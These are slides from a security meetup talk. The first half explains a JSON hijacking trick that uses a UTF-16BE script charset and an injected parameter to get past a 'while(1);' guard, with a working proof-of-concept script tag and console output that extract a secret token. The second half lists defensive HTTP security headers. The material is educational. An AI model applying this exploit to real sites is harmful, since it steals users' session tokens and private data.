One Trick
and
One Treat
Renato Rodrigues - @SiMpS0N - //pathonproject.com
ØxOPOSɆC Mɇɇtuᵽ [0x6F] - The Meet
Trick
𝐔ni͓̽co̷d乇
Specify a charset
<script src="//JSON-ENDPOINT" charset="utf-16be"></script>
Content-Type: application/json;
charset=utf-8
The weird case of JSON Hijack
while(1);[{token:"secret1",uid:"INJECTION"}]Remember: UTF-8 ( 1 byte) | UTF-16 ( 2 bytes) | UTF-32 ( 4 bytes)
Goals:
- Use a non-ASCII encoding in order to avoid the infinite loop;
- Have valid Javascript.
𝐔ni͓̽co̷d乇
The weird case of JSON Hijack
while(1) ... -> To Unicode
>`\u{77}\u{68}\u{69}\u{6c}\u{65}\u{28}\u{31}\u{29}`
while(1)
UTF-16BE Encode
>`\u{7768}\u{696c}\u{6528}\u{3129}`
"睨楬攨ㄩ" ...
Since the JSON endpoint had an injection
By injecting
"unicode_identifier=1//"
We can access the "window" object, and get the last prop set:
JSON content will be inside its bytes!
睨楬攨ㄩ .. %00=%001%00/%00/Object.keys(self).pop()DEMO
<script charset="utf-16be" src="http://demo.vwzq.net/php/secret.php?uid=%00=%001%00%2f%00%2f"></script>
<script>alert(unescape(escape((Object.keys(window).pop())).replace(/%u(..)(..)/g,'%$1%$2')).substr(18,7))</script>
<pre>
> Object.keys(window).pop()
"睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢"
> escape("睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢")
"%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22"
> "%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22".replace(/%u(..)(..)/g,'%$1%$2')
"%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22"
> unescape("%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22")
"while(1);[{token:"secret1",uid:""
> 'while(1);[{token:"secret1",uid:"'.substr(18,7)
"secret1"
</pre>
TREAT
Classic Sec. Headers
X-Xss-Protection
X-Frame-Options
X-Content-Type-Options
Strict-Transport-Security
Public-Key-Pins
Content-Security-PolicY
"New"Sec. Headers
Referrer-Policy
HTTP header governs which referrer information, sent in the Referrer header, should be included with requests made.
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Feature-Policy
Feature Policy will allow a site to enable or disable certain browser features and APIs in the interest of better security and privacy.
Feature-Policy:
accelerometer 'none';
camera 'none';
geolocation 'none';
gyroscope 'none';
microphone 'none';
payment 'none';
usb 'none'
push 'self'
...
"New"Sec. Headers
Suborigins
Clear Site Data
Mechanism for programmatically defining origins to isolate different applications running in the same physical origin.
Clears browsing data (cookies, storage, cache) associated with the requesting website.